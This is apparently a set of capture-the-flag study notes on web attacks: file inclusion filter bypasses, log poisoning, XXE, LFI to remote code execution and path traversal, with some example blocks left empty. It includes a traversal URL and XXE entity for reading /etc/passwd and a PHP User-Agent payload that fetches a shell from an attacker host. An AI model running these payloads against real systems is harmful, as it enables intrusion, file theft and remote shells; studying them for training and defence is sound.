Nice articcles to read

Classic ones

  • If you find the php code with the filter like:
	    //FLAG: thm{explo1t1ng_lf1}
            function containsStr($str, $substr) {
                return strpos($str, $substr) !== false;
	    if(!containsStr($_GET['view'], '../..') && containsStr($_GET['view'], '/var/www/html/development_testing')) {
            	include $_GET['view'];
		echo 'Sorry, Thats not allowed';
  • You can just apply a filter like: http://mafialive.thm/test.php?view=/var/www/html/development_testing/..//..//..//..//../etc/passwd

Adding parameter file to url

  • Linux File Inclussion
    • Check the url adding parameter file

Fuzzing it

wfuzz -c -w dirTraversal.txt  --hw 0

Bypassing filters with encodings

  • If the backend is filtering by checking the input, try this:
# example
  • Check out the &ext variable and put it empty because it wonโ€™t get the file extension

Log poisoning

  • To perform this, first check out if you have access to the log file in an apache with Burpsuite:

  • Log file contamination


Exploiting the User-Agent field

  • Exploit the User-Agent Field:
    • First create a shell like the PentestMonkey one
    • Create a python server
    • Load the petition (like log file contamination petition) and capture it with BurpSuite
    • Modify the User-Agent field with this command:
<?php file_put_contents('shell.php', file_get_contents('http://IP_ATTACK:PORT/shell.php'))?>
  • Then access to http://IP/shell.php and you got the reverse shell

Regex filtering

When we can echo commands try and itโ€™s using a regex like: /[#!@%^&*()$_=\[\]\';,{}:>?~\\\\]/ try:

# Then just try other commands like
# Then try to input a reverse shell

Web filtering

If a web shell filters your input, try to encode it into base64

XML file inclusion (XXE)

  • Detailed info about XXE in

  • If a web accepts XML, it could be vulnerable to XXE.

  • You can try to upload a code like this to inspect the system:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
   <!ELEMENT data ANY >
   <!ENTITY name SYSTEM "file:///etc/passwd" >]>
  <com>Hacking Articles</com>
  • Change the "file:///etc/passwd" for the one you want

Lfi to RCE

If you can read some files by some kind of escape, we can bruteforce the /proc/self/ directory in Apache.

This directory holds information about different processes. Each process is distinguished by its PID as shown below:

Every process can access its available information by requesting theย /proc/selfย directory.

As Apache is requesting this file (via the LFI vulnerability) and since the file is located inside Apacheโ€™s proc directory, we can useย /proc/selfย instead of searching for Apacheโ€™s PID. In a brief recap we could say thatย /proc/self/environย is โ€“ roughly- equal toย /proc/<apache_pid>/environ.

The contents of this directory areย symbolic linksย pointing to the actual file of the processโ€™ open file handlers:

It goes without saying that during the attack we do not know which symbolic link points to which file. The file we will be interested in is the Apacheย access log. We choose this file as itโ€™s dynamic and can be changed based on our input.

To identify the file, we will use Burp Intruder.

First, we set up the position of our payload.

As File Descriptors are identified by a numeric id, we choose the proper payload.ย Payloads > Payload type: Numbers

A successfull attack should look like:

Now we would perform a Log Poisoning attack.

Path traversal

# You can perform

Otherwise, if you want to do it manual you can use BurpSuite and try some combinations.

Blind OS command injection

If youโ€™ve got this kind of request:

Use the following payload:
